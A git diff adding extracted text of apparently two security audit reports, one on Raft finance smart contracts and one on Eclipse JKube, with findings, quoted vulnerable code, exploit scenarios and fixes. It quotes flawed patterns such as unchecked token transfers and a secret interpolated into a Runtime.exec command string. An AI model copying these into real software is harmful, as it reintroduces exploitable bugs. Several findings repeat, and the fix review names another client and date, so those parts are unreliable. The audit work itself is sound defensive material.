_MINUTES_IN_1000_YEARS = 1000 * 356 days / 1 minutes; Figure 3.1: The declaration of the _MINUTES_IN_1000_YEARS constant Recommendations Short term, change the code to compute the _MINUTES_IN_1000_YEARS constant as 1000 * 365 days / 1 minutes . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the system. Integrate Echidna and smart contract fuzzing in the system to triangulate subtle arithmetic issues. +4. Inconsistent use of safeTransfer for collateralToken Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-RAFT-4 Target: PositionManager.sol, PositionManagerStETH.sol Description The Raft contracts rely on ERC-20 tokens as collateral that must be deposited in order to mint R tokens. However, although the SafeERC20 library is used for collateral token transfers, there are a few places where the safeTransfer function is missing: ● The transfer of collateralToken in the liquidate function in the PositionManager contract: if (!isRedistribution) { rToken.burn( msg.sender , entirePositionDebt); _totalDebt -= entirePositionDebt; emit TotalDebtChanged(_totalDebt); // Collateral is sent to protocol as a fee only in case of liquidation collateralToken.transfer(feeRecipient, collateralLiquidationFee); } collateralToken.transfer( msg.sender , collateralToSendToLiquidator); Figure 4.1: Unchecked transfers in PositionManager.liquidate ● The transfer of stETH in the managePositionStETH function in the PositionManagerStETH contract: { if (isCollateralIncrease) { stETH.transferFrom( msg.sender , address ( this ), collateralChange); stETH.approve( address (wstETH), collateralChange); uint256 wstETHAmount = wstETH.wrap(collateralChange); _managePosition( ... ); } else { _managePosition( ... ); uint256 stETHAmount = wstETH.unwrap(collateralChange); stETH.transfer( msg.sender , stETHAmount); } } Figure 4.2: Unchecked transfers in PositionManagerStETH.managePositionStETH Exploit Scenario Governance approves an ERC-20 token that returns a Boolean on failure to be used as collateral. However, since the return values of this ERC-20 token are not checked, Alice, a liquidator, does not receive any collateral for performing a liquidation. Recommendations Short term, use the SafeERC20 library’s safeTransfer function for the collateralToken . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol. +5. Tokens may be trapped in an invalid position Severity: Informational Difficulty: High Type: Denial of Service Finding ID: TOB-RAFT-5 Target: PositionManager.sol Description The Raft finance contracts allow users to take out positions by depositing collateral and minting a corresponding amount of R tokens as debt. In order to exit a position, a user must pay back their debt, which allows them to receive their collateral back. To check that a position is closed, the _managePosition function contains a branch that validates that the position's debt is zero after adjustment. However, if the position's debt is zero but there is still some collateral present even after adjustment, then the position is considered invalid and cannot be closed. This could be problematic, especially if some dust is present in the position after the collateral is withdrawn. if (positionDebt == 0 ) { if (positionCollateral != 0 ) { revert InvalidPosition(); } // position was closed, remove it _closePosition(collateralToken, position, false ); } else { _checkValidPosition(collateralToken, positionDebt, positionCollateral); if (newPosition) { collateralTokenForPosition[position] = collateralToken; emit PositionCreated(position); } } Figure 5.1: A snippet from the _managePosition function showing that a position with no debt cannot be closed if any amount of collateral remains Exploit Scenario Alice, a borrower, wants to pay back her debt and receive her collateral in exchange. However, she accidentally leaves some collateral in her position despite paying back all her debt. As a result, her position cannot be closed. Recommendations Short term, if a position's debt is zero, have the _managePosition function refund any excess collateral and close the position. Long term, carefully investigate potential edge cases in the system and use smart contract fuzzing to determine if those edge cases can be realistically reached. +6. Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-RAFT-6 Target: TellorPriceOracle.sol Description The Raft finance contracts rely on oracles to compute the price of the collateral tokens used throughout the codebase. If the Chainlink oracle is down, the Tellor oracle is used as a backup. However, the Tellor oracle does not use the stETH/USD price feed. Instead it uses the ETH/USD price feed to determine the price of stETH. This could be problematic if stETH depegs, which can occur during black swan events. function _getCurrentTellorResponse() internal view returns (TellorResponse memory tellorResponse) { uint256 count; uint256 time; uint256 value; try tellor.getNewValueCountbyRequestId(ETHUSD_TELLOR_REQ_ID) returns ( uint256 count_) { count = count_; } catch { return (tellorResponse); } Figure 6.1: The Tellor oracle fetching the price of ETH to determine the price of stETH Exploit Scenario Alice has a position in the system. A significant black swan event causes the depeg of staked Ether. As a result, the Tellor oracle returns an incorrect price, which prevents Alice's position from being liquidated despite being eligible for liquidation. Recommendations Short term, carefully monitor the Tellor oracle, especially during any sort of market volatility. Long term, investigate the robustness of the oracles and document possible circumstances that could cause them to return incorrect prices. +7. Incorrect constant value for MAX_REDEMPTION_SPREAD Severity: Medium Difficulty: Low Type: Configuration Finding ID: TOB-RAFT-7 Target: PositionManager.sol Description The Raft protocol allows a user to redeem their R tokens for underlying wstETH at any time. By doing so, the protocol ensures that it maintains overcollateralization. The redemption spread is part of the redemption rate, which changes based on the price of the R token to incentivize or disincentivize redemption. However, the documentation says that the maximum redemption spread should be 100% and that the protocol will initially set it to 100%. In the code, the MAX_REDEMPTION_SPREAD constant is set to 2%, and the redemptionSpread variable is set to 1% at construction. This is problematic because setting the rate to 100% is necessary to effectively disable redemptions at launch. uint256 public constant override MIN_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 10_000 * 25 ; // 0.25% uint256 public constant override MAX_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 100 * 2 ; // 2% Figure 7.1: Constants specifying the minimum and maximum redemption spread percentages constructor (ISplitLiquidationCollateral newSplitLiquidationCollateral) FeeCollector( msg.sender ) { rToken = new RToken( address ( this ), msg.sender ); raftDebtToken = new ERC20Indexable( address ( this ), string ( bytes .concat( "Raft " , bytes (IERC20Metadata( address (rToken)).name()), " debt" )), string ( bytes .concat( "r" , bytes (IERC20Metadata( address (rToken)).symbol()), "-d" )) ); setRedemptionSpread(MathUtils._100_PERCENT / 100 ); setSplitLiquidationCollateral(newSplitLiquidationCollateral); emit PositionManagerDeployed(rToken, raftDebtToken, msg.sender ); } Figure 7.2: The redemption spread being set to 1% instead of 100% in the PositionManager ’s constructor Exploit Scenario The protocol sets the redemption spread to 2%. Alice, a borrower, redeems her R tokens for some underlying wstETH, despite the developers’ intentions. As a result, the stablecoin experiences significant volatility. Recommendations Short term, set the MAX_REDEMPTION_SPREAD value to 100% and set the redemptionSpread variable to MAX_REDEMPTION_SPREAD in the PositionManager contract’s constructor. Long term, improve unit test coverage to identify incorrect behavior and edge cases in the protocol. +1. Solidity compiler optimizations can be problematic Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-RAFT-1 Target: foundry.toml Description The Raft Finance contracts have enabled compiler optimizations. There have been several optimization bugs with security implications. Additionally, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them, so how well they are being tested and exercised is unknown. High-severity security issues due to optimization bugs have occurred in the past. For example, a high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG . Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity v0.5.6 . More recently, a bug due to the incorrect caching of Keccak-256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Raft Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. +2. Issues with Chainlink oracle’s return data validation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-RAFT-2 Target: contracts/Oracles/ChainlinkPriceOracle.sol Description Chainlink oracles are used to compute the price of a collateral token throughout the protocol. When validating the oracle's return data, the returned price is compared to the price of the previous round. However, there are a few issues with the validation: ● ● ● The increase of the currentRoundId value may not be statically increasing across rounds. The only requirement is that the roundID increases monotonically. The updatedAt value in the oracle response is never checked, so potentially stale data could be coming from the priceAggregator contract. The roundId and answeredInRound values in the oracle response are not checked for equality, which could indicate that the answer returned by the oracle is fresh. function _badChainlinkResponse (ChainlinkResponse memory response) internal view returns ( bool ) { return !response.success || response.roundId == 0 || response.timestamp == 0 || response.timestamp > block.timestamp || response.answer <= 0 ; } Figure 2.1: The Chainlink oracle response validation logic Exploit Scenario The Chainlink oracle attempts to compare the current returned price to the price in the previous roundID . However, because the roundID did not increase by one from the previous round to the current round, the request fails, and the price oracle returns a failure. A stale price is then used by the protocol. Recommendations Short term, have the code validate that the timestamp value is greater than 0 to ensure that the data is fresh. Also, have the code check that the roundID and answeredInRound values are equal to ensure that the returned answer is not stale. Lastly check that the timestamp value is not decreasing from round to round. Long term, carefully investigate oracle integrations for potential footguns in order to conform to correct API usage. References ● The Historical-Price-Feed-Data Project +3. Incorrect constant for 1000-year periods Severity: Informational Difficulty: High Type: Configuration Finding ID: TOB-RAFT-3 Target: contracts/Dependencies/MathUtils.sol Description The Raft finance contracts rely on computing the exponential decay to determine the correct base rate for redemptions. In the MathUtils library, a period of 1000 years is chosen as the maximum time period for the decay exponent to prevent an overflow. However, the _MINUTES_IN_1000_YEARS constant used is currently incorrect: /// @notice Number of minutes in 1000 years. uint256 internal constant _MINUTES_IN_1000_YEARS = 1000 * 356 days / 1 minutes; Figure 3.1: The declaration of the _MINUTES_IN_1000_YEARS constant Recommendations Short term, change the code to compute the _MINUTES_IN_1000_YEARS constant as 1000 * 365 days / 1 minutes . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the system. Integrate Echidna and smart contract fuzzing in the system to triangulate subtle arithmetic issues. +4. Inconsistent use of safeTransfer for collateralToken Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-RAFT-4 Target: PositionManager.sol, PositionManagerStETH.sol Description The Raft contracts rely on ERC-20 tokens as collateral that must be deposited in order to mint R tokens. However, although the SafeERC20 library is used for collateral token transfers, there are a few places where the safeTransfer function is missing: ● The transfer of collateralToken in the liquidate function in the PositionManager contract: if (!isRedistribution) { rToken.burn( msg.sender , entirePositionDebt); _totalDebt -= entirePositionDebt; emit TotalDebtChanged(_totalDebt); // Collateral is sent to protocol as a fee only in case of liquidation collateralToken.transfer(feeRecipient, collateralLiquidationFee); } collateralToken.transfer( msg.sender , collateralToSendToLiquidator); Figure 4.1: Unchecked transfers in PositionManager.liquidate ● The transfer of stETH in the managePositionStETH function in the PositionManagerStETH contract: { if (isCollateralIncrease) { stETH.transferFrom( msg.sender , address ( this ), collateralChange); stETH.approve( address (wstETH), collateralChange); uint256 wstETHAmount = wstETH.wrap(collateralChange); _managePosition( ... ); } else { _managePosition( ... ); uint256 stETHAmount = wstETH.unwrap(collateralChange); stETH.transfer( msg.sender , stETHAmount); } } Figure 4.2: Unchecked transfers in PositionManagerStETH.managePositionStETH Exploit Scenario Governance approves an ERC-20 token that returns a Boolean on failure to be used as collateral. However, since the return values of this ERC-20 token are not checked, Alice, a liquidator, does not receive any collateral for performing a liquidation. Recommendations Short term, use the SafeERC20 library’s safeTransfer function for the collateralToken . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol. +5. Tokens may be trapped in an invalid position Severity: Informational Difficulty: High Type: Denial of Service Finding ID: TOB-RAFT-5 Target: PositionManager.sol Description The Raft finance contracts allow users to take out positions by depositing collateral and minting a corresponding amount of R tokens as debt. In order to exit a position, a user must pay back their debt, which allows them to receive their collateral back. To check that a position is closed, the _managePosition function contains a branch that validates that the position's debt is zero after adjustment. However, if the position's debt is zero but there is still some collateral present even after adjustment, then the position is considered invalid and cannot be closed. This could be problematic, especially if some dust is present in the position after the collateral is withdrawn. if (positionDebt == 0 ) { if (positionCollateral != 0 ) { revert InvalidPosition(); } // position was closed, remove it _closePosition(collateralToken, position, false ); } else { _checkValidPosition(collateralToken, positionDebt, positionCollateral); if (newPosition) { collateralTokenForPosition[position] = collateralToken; emit PositionCreated(position); } } Figure 5.1: A snippet from the _managePosition function showing that a position with no debt cannot be closed if any amount of collateral remains Exploit Scenario Alice, a borrower, wants to pay back her debt and receive her collateral in exchange. However, she accidentally leaves some collateral in her position despite paying back all her debt. As a result, her position cannot be closed. Recommendations Short term, if a position's debt is zero, have the _managePosition function refund any excess collateral and close the position. Long term, carefully investigate potential edge cases in the system and use smart contract fuzzing to determine if those edge cases can be realistically reached. +6. Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-RAFT-6 Target: TellorPriceOracle.sol Description The Raft finance contracts rely on oracles to compute the price of the collateral tokens used throughout the codebase. If the Chainlink oracle is down, the Tellor oracle is used as a backup. However, the Tellor oracle does not use the stETH/USD price feed. Instead it uses the ETH/USD price feed to determine the price of stETH. This could be problematic if stETH depegs, which can occur during black swan events. function _getCurrentTellorResponse() internal view returns (TellorResponse memory tellorResponse) { uint256 count; uint256 time; uint256 value; try tellor.getNewValueCountbyRequestId(ETHUSD_TELLOR_REQ_ID) returns ( uint256 count_) { count = count_; } catch { return (tellorResponse); } Figure 6.1: The Tellor oracle fetching the price of ETH to determine the price of stETH Exploit Scenario Alice has a position in the system. A significant black swan event causes the depeg of staked Ether. As a result, the Tellor oracle returns an incorrect price, which prevents Alice's position from being liquidated despite being eligible for liquidation. Recommendations Short term, carefully monitor the Tellor oracle, especially during any sort of market volatility. Long term, investigate the robustness of the oracles and document possible circumstances that could cause them to return incorrect prices. +7. Incorrect constant value for MAX_REDEMPTION_SPREAD Severity: Medium Difficulty: Low Type: Configuration Finding ID: TOB-RAFT-7 Target: PositionManager.sol Description The Raft protocol allows a user to redeem their R tokens for underlying wstETH at any time. By doing so, the protocol ensures that it maintains overcollateralization. The redemption spread is part of the redemption rate, which changes based on the price of the R token to incentivize or disincentivize redemption. However, the documentation says that the maximum redemption spread should be 100% and that the protocol will initially set it to 100%. In the code, the MAX_REDEMPTION_SPREAD constant is set to 2%, and the redemptionSpread variable is set to 1% at construction. This is problematic because setting the rate to 100% is necessary to effectively disable redemptions at launch. uint256 public constant override MIN_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 10_000 * 25 ; // 0.25% uint256 public constant override MAX_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 100 * 2 ; // 2% Figure 7.1: Constants specifying the minimum and maximum redemption spread percentages constructor (ISplitLiquidationCollateral newSplitLiquidationCollateral) FeeCollector( msg.sender ) { rToken = new RToken( address ( this ), msg.sender ); raftDebtToken = new ERC20Indexable( address ( this ), string ( bytes .concat( "Raft " , bytes (IERC20Metadata( address (rToken)).name()), " debt" )), string ( bytes .concat( "r" , bytes (IERC20Metadata( address (rToken)).symbol()), "-d" )) ); setRedemptionSpread(MathUtils._100_PERCENT / 100 ); setSplitLiquidationCollateral(newSplitLiquidationCollateral); emit PositionManagerDeployed(rToken, raftDebtToken, msg.sender ); } Figure 7.2: The redemption spread being set to 1% instead of 100% in the PositionManager ’s constructor Exploit Scenario The protocol sets the redemption spread to 2%. Alice, a borrower, redeems her R tokens for some underlying wstETH, despite the developers’ intentions. As a result, the stablecoin experiences significant volatility. Recommendations Short term, set the MAX_REDEMPTION_SPREAD value to 100% and set the redemptionSpread variable to MAX_REDEMPTION_SPREAD in the PositionManager contract’s constructor. Long term, improve unit test coverage to identify incorrect behavior and edge cases in the protocol. +8. Liquidation rewards are calculated incorrectly Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-RAFT-8 Target: SplitLiquidationCollateral.sol Description Whenever a position's collateralization ratio falls between 100% and 110%, the position becomes eligible for liquidation. A liquidator can pay off the position's total debt to restore solvency. In exchange, the liquidator receives a liquidation reward for removing bad debt, in addition to the amount of debt the liquidator has paid off. However, the calculation performed in the split function is incorrect and does not reward the liquidator with the matchingCollateral amount of tokens: function split( uint256 totalCollateral, uint256 totalDebt, uint256 price, bool isRedistribution ) external pure returns ( uint256 collateralToSendToProtocol, uint256 collateralToSentToLiquidator) { if (isRedistribution) { ... } else { uint256 matchingCollateral = totalDebt.divDown(price); uint256 excessCollateral = totalCollateral - matchingCollateral; uint256 liquidatorReward = excessCollateral.mulDown(_calculateLiquidatorRewardRate(totalDebt)); collateralToSendToProtocol = excessCollateral - liquidatorReward; collateralToSentToLiquidator = liquidatorReward; } } Figure 8.1: The calculations for how to split the collateral between the liquidator and the protocol, showing that the matchingCollateral is omitted from the liquidator’s reward Exploit Scenario Alice, a liquidator, attempts to liquidate an insolvent position. However, upon liquidation, she receives only the liquidationReward amount of tokens, without the matchingCollateral . As a result her liquidation is unprofitable and she has lost funds. Recommendations Short term, have the code compute the collateralToSendToLiquidator variable as liquidationReward + matchingCollateral . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Front-Running Resistance Low-Level Manipulation The system’s resistance to front-running attacks The justified use of inline assembly and low-level calls Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of future vulnerabilities. ● Fix incorrect comments. The comment below refers to the secondary oracle, not the primary oracle. // If primary oracle is broken or frozen, both oracles are untrusted, and return last good price if (secondaryOracleResponse.isBrokenOrFrozen) { return lastGoodPrice; } Figure C.1: The comment in the fetchPrice function ( PriceFeed.sol#L70–L73 ) ● Declare variables once to avoid unnecessary storage reads. uint256 icr = MathUtils._computeCR( raftCollateralTokens[collateralToken].token.balanceOf(position), raftDebtToken.balanceOf(position) , price ); if (icr >= MathUtils.MCR) { revert NothingToLiquidate(); } uint256 entirePositionDebt = raftDebtToken.balanceOf(position); uint256 entirePositionCollateral = raftCollateralTokens[collateralToken].token.balanceOf(position); Figure C.2: The multiple storage reads in the liquidate function ( PositionManager.sol#L175–L183 ) D. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On May 10, 2022, reviewed the fixes and mitigations implemented by the Raft team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the eight issues described in this report, Tempus has resolved seven issues and has not resolved the remaining issue. For additional information, please see the Detailed Fix Review Results below. ID Title Severity Status 1 Solidity compiler optimizations can be problematic Informational Unresolved 2 Issues with Chainlink oracle’s return data validation Low Resolved 3 Incorrect constant for 1000-year periods Informational Resolved Detailed Fix Review Results TOB-RAFT-1: Solidity compiler optimizations can be problematic Unresolved. TOB-RAFT-2: Issues with Chainlink oracle’s return data validation Resolved in PR #281 . The Raft team added checks to catch whether the roundID and answeredInRound values do not match, as well as additional validation of the timestamp response. These checks cover cases of invalid responses from Chainlink. However, the validation logic still assumes roundID s always increment by 1 between valid rounds. This is not guaranteed to be true, especially when the underlying aggregator is updated (i.e., when the phaseID in the proxy, which is incorporated into the most significant bytes of the roundID , is incremented). This would result in the PriceFeed temporarily falling back to the secondary oracle until the next round data is available from the Chainlink oracle, despite receiving a valid response. The infrequency of Chainlink upgrades and graceful oracle fallback and recovery make it unlikely that this edge case will impact system availability. TOB-RAFT-3: Incorrect constant for 1000-year periods Resolved in PR #275 . The constant was updated to the correct value. TOB-RAFT-4: Inconsistent use of safeTransfer for collateralToken Resolved in PR #265 . The PositionManager contract has been updated to use the safeERC20 library’s safeTransfer function for collateralToken transfers. Calls to stETH.transferFrom were not updated, but this is not necessary because the contract is specific to stETH and its semantics are known. TOB-RAFT-5: Tokens may be trapped in an invalid position Resolved in PR #264 and PR #267 . The managePosition function (name altered during fix review) now correctly closes a position when all the debt is repaid. TOB-RAFT-6: Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price Resolved in PR #279 . The Tellor oracle has been updated to fetch the stETH price directly instead of assuming stETH/ETH parity. TOB-RAFT-7: Incorrect constant value for MAX_REDEMPTION_SPREAD Resolved in PR #263 . The constants for the redemption spread have been updated to the correct values. TOB-RAFT-8: Liquidation rewards are calculated incorrectly Resolved in PR #246 . Liquidations now correctly return the matched collateral and the liquidator reward to the liquidator. diff --git a/findings_newupdate/tob/2023-05-eclipse-jkube-securityreview.txt b/findings_newupdate/tob/2023-05-eclipse-jkube-securityreview.txt new file mode 100644 index 0000000..cc046df --- /dev/null +++ b/findings_newupdate/tob/2023-05-eclipse-jkube-securityreview.txt @@ -0,0 +1,3 @@ +1. Insecure defaults in generated artifacts Severity: Informational Difficulty: Undetermined Type: Configuration Finding ID: TOB-JKUBE-1 Target: Artifacts generated by JKube Description JKube can generate Kubernetes deployment artifacts and deploy applications using those artifacts. By default, many of the security features offered by Kubernetes are not enabled in these artifacts. This can cause the deployed applications to have more permissions than their workload requires. If such an application were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, some of which are documented in appendix E . Similarly, the generated artifacts do not employ some best practices, such as referencing container images by hash, which could help prevent certain supply chain attacks. We compiled several of the examples contained in the quickstarts folder and analyzed them. We observed instances of the following problems in the artifacts produced by JKube: ● ● ● ● ● ● ● ● Pods have no associated network policies . Dockerfiles have base image references that use the latest tag. Container image references use the latest tag, or no tag, instead of a named tag or a digest. Resource (CPU, memory) limits are not set. Containers do not have the allowPrivilegeEscalation setting set. Containers are not configured to use a read-only filesystem. Containers run as the root user and have privileged capabilities. Seccomp profiles are not enabled on containers. ● Service account tokens are mounted on pods where they may not be needed. Exploit Scenario An attacker compromises one application running on a Kubernetes cluster. The attacker takes advantage of the lax security configuration to move laterally and attack other system components. Recommendations Short term, improve the default generated configuration to enhance the security posture of applications deployed using JKube, while maintaining compatibility with most common scenarios. Apply automatic tools such as Checkov during development to review the configuration generated by JKube and identify areas for improvement. Long term, implement mechanisms in JKube to allow users to configure more advanced security features in a convenient way. References ● ● Appendix D: Docker Recommendations Appendix E: Hardening Containers Run via Kubernetes +1. Insecure defaults in generated artifacts Severity: Informational Difficulty: Undetermined Type: Configuration Finding ID: TOB-JKUBE-1 Target: Artifacts generated by JKube Description JKube can generate Kubernetes deployment artifacts and deploy applications using those artifacts. By default, many of the security features offered by Kubernetes are not enabled in these artifacts. This can cause the deployed applications to have more permissions than their workload requires. If such an application were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, some of which are documented in appendix E . Similarly, the generated artifacts do not employ some best practices, such as referencing container images by hash, which could help prevent certain supply chain attacks. We compiled several of the examples contained in the quickstarts folder and analyzed them. We observed instances of the following problems in the artifacts produced by JKube: ● ● ● ● ● ● ● ● Pods have no associated network policies . Dockerfiles have base image references that use the latest tag. Container image references use the latest tag, or no tag, instead of a named tag or a digest. Resource (CPU, memory) limits are not set. Containers do not have the allowPrivilegeEscalation setting set. Containers are not configured to use a read-only filesystem. Containers run as the root user and have privileged capabilities. Seccomp profiles are not enabled on containers. ● Service account tokens are mounted on pods where they may not be needed. Exploit Scenario An attacker compromises one application running on a Kubernetes cluster. The attacker takes advantage of the lax security configuration to move laterally and attack other system components. Recommendations Short term, improve the default generated configuration to enhance the security posture of applications deployed using JKube, while maintaining compatibility with most common scenarios. Apply automatic tools such as Checkov during development to review the configuration generated by JKube and identify areas for improvement. Long term, implement mechanisms in JKube to allow users to configure more advanced security features in a convenient way. References ● ● Appendix D: Docker Recommendations Appendix E: Hardening Containers Run via Kubernetes +2. Risk of command line injection from secret Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-JKUBE-2 Target: jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/spri ngboot/watcher/SpringBootWatcher.java Description As part of the Spring Boot watcher functionality, JKube executes a second Java process. The command line for this process interpolates an arbitrary secret, making it unsafe. This command line is then tokenized by separating on spaces. If the secret contains spaces, this process could allow an attacker to add arbitrary arguments and command-line flags and modify the behavior of this command execution. StringBuilder buffer = new StringBuilder( "java -cp " ); (...) buffer.append( " -Dspring.devtools.remote.secret=" ); buffer.append( remoteSecret ); buffer.append( " org.springframework.boot.devtools.RemoteSpringApplication " ); buffer.append(url); try { String command = buffer.toString(); log.debug( "Running: " + command); final Process process = Runtime.getRuntime().exec(command) ; Figure 2.1: A secret is used without sanitization on a command string that is then executed. ( jkube/jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/sp ringboot/watcher/SpringBootWatcher.java#136–171 ) Exploit Scenario An attacker forks an open source project that uses JKube and Spring Boot, improves it in some useful way, and introduces a malicious spring.devtools.remote.secret secret in application.properties . A user then finds this forked project and sets it up locally. When the user runs mvn k8s:watch , JKube invokes a command that includes attacker-controlled content, compromising the user’s machine. Recommendations Short term, rewrite the command-line building code to use an array of arguments instead of a single command-line string. Java provides several variants of the exec method, such as exec(String[]) , which are safer to use when user-provided input is involved. Long term, integrate static analysis tools in the development process and CI/CD pipelines, such as Semgrep and CodeQL, to detect instances of similar problems early on. Review uses of user-controlled input to ensure they are sanitized if necessary and processed safely. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Configuration The configuration of system components in accordance with best practices Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Data Handling The safe handling of user inputs and data processed by the system Documentation The presence of comprehensive and readable codebase documentation Maintenance The timely maintenance of system components to mitigate risk Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Non-Security-Related Findings The following recommendations are not associated with specific vulnerabilities. However, implementing them may enhance code readability and may prevent the introduction of vulnerabilities in the future. ● The following if condition is always true. i is always less than objects.length ; otherwise, the for loop would not be executing. The developer likely intended to use ++i instead of i++ . for ( int i = 0 ; i < objects.length; ) { sb.append(objects[i]); if ( i++ < objects.length ) { sb.append(joinWith); } } Figure C.1: This if condition is always true. ( jkube/kube-kit/build/api/src/test/java/org/eclipse/jkube/kit/build/api/h elper/PathTestUtil.java#69–74 ) ● The AssemblyManager singleton may not work as expected on multi-threaded environments. Consider making the initialization synchronized. public static AssemblyManager getInstance () { if (dockerAssemblyManager == null ) { dockerAssemblyManager = new AssemblyManager(); } return dockerAssemblyManager; } Figure C.2: This initialization is not thread-safe. ( jkube/jkube-kit/build/api/src/main/java/org/eclipse/jkube/kit/buil d/api/assembly/AssemblyManager.java#81–86 ) ● The following format string call has more arguments than parameters. throw new DockerAccessException(e, "Unable to add tag [%s] to image [%s]" , targetImage, sourceImage , e ); Figure 